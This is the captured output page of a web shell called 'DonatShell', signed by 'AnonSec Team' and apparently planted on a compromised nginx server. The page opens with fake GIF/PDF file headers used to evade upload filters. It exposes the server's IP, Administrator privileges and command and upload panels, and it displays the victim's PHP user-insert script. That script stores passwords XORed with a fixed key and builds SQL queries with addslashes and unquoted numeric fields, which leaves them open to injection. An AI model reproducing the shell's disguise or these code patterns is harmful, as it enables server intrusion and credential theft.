GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/qry/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/qry/UserInsert.phpinc
<?
// UserInsert.in
// Insert the new User.
// $userUsername - the user.userUsername.
// $userPassword - the user.userPassword. Defaults to ''.
// $userTECH_ID - the user.userTECH_ID. Defaults to ''.
// $userPermission - the user.userPermission. Defaults to ''.
// $userFirstName - the user.userFirstName. Defaults to Unknown.
// $userMiddleName - the user.userMiddleName. Defaults to ''.
// $userLastName - the user.userLastName. Defaults to Unknown.
// $userNickname - the user.userNickname. Defaults to ''.
// $userImage - the user.userImage. Defaults to ''.
// $userLastLogin - the user.userLastLogin. Set to '' or currentdate.
// $userLoginCount - the user.userLoginCount. Defaults to ''.
// $userIsInactive - the user.userIsInactive. Defaults to 0.
// $LastModified - the user.LastModified. Set to '' or currentdate.
// $_SESSION['UserTrueId'] - the user.ModifiedBy. If this is a system add, UserTrueID=1 will be used.
debugTrackBegin();
$currentdate = currentDateTime();
if (!isset($userUsername)) { 
	$userUsername = ''; 
	$_SESSION['TRACK'] .= "<li>The userUsername was not set in user add attempt. This must be set for all users!\n";
	$_SESSION['errorMessage'] .= "<li>The userUsername was not set in user add attempt. This must be set for all users!\n";
}
if (!isset($userPassword)) { $userPassword = $_REQUEST['password']; }// $userPassword = '';
//echo "\$userPassword=".$userPassword.".<br>\n";
$PWD = $userPassword ^ 'qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm';
//echo "\$PWD=".$PWD.".<br>\n";
//$PWD2 = $PWD ^ 'qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm';
//echo "\$PWD2=".$PWD2.".<br>\n";
if (!isset($userTECH_ID)) { $userTECH_ID = ''; }// $userTECH_ID = '';
if (!isset($userPermission)) {
	$userPermission = 0;
}
if (!isset($userFirstName)) { $userFirstName = 'Unknown'; }
if (!isset($userMiddleName)) { $userMiddleName = ''; }
if (!isset($userLastName)) { $userLastName = 'Unknown'; }
if (!isset($userNickname)) { $userNickname = ''; }
if (!isset($userImage)) { $userImage = ''; }
if (!isset($userIsInactive)) { $userIsInactive = 0; }
if ($_SESSION['UserTrueId'] != '') {
	$userLastLogin = 0;
	$userLoginCount = 0;
	$Modifiedby = $_SESSION['UserTrueId'];
} else {
	$userLastLogin = $currentdate;
	$userLoginCount = 1;
	$Modifiedby = 1;
}
$query=sprintf("
INSERT INTO user (
	userUsername,
	userPassword,
	userTECH_ID,
	userPermission,
	userFirstName,
	userMiddleName,
	userLastName,
	userEmail,
	userNickname,
	userImage,
	userLastLogin,
	userLoginCount,
	userIsInactive,
	LastModified,
	ModifiedBy)
VALUES (
	'%s','%s','%s',%s,'%s','%s','%s','%s','%s','%s','%s',%s,%s,'%s',%s)"
, get_magic_quotes_gpc() ? $userUsername : addslashes($userUsername)
, get_magic_quotes_gpc() ? $PWD : addslashes($PWD)
, get_magic_quotes_gpc() ? $userTECH_ID : addslashes($userTECH_ID)
, get_magic_quotes_gpc() ? $userPermission : addslashes($userPermission)
, get_magic_quotes_gpc() ? $userFirstName : addslashes($userFirstName)
, get_magic_quotes_gpc() ? $userMiddleName : addslashes($userMiddleName)
, get_magic_quotes_gpc() ? $userLastName : addslashes($userLastName)
, get_magic_quotes_gpc() ? $userEmail : addslashes($userEmail)
, get_magic_quotes_gpc() ? $userNickname : addslashes($userNickname)
, get_magic_quotes_gpc() ? $userImage : addslashes($userImage)
, get_magic_quotes_gpc() ? $userLastLogin : addslashes($userLastLogin)
, get_magic_quotes_gpc() ? $userLoginCount : addslashes($userLoginCount)
, get_magic_quotes_gpc() ? $userIsInactive : addslashes($userIsInactive)
, get_magic_quotes_gpc() ? $currentdate : addslashes($currentdate)
, get_magic_quotes_gpc() ? $Modifiedby : addslashes($Modifiedby)
); 
$_SESSION['TRACK'] .= "<li>".$query."\n";
//echo "\$query=".$query."<br>\n";
$UserInsert_result = query_do($query);
debugTrackEnd();
?>

Anon7 - 2022
AnonSec Team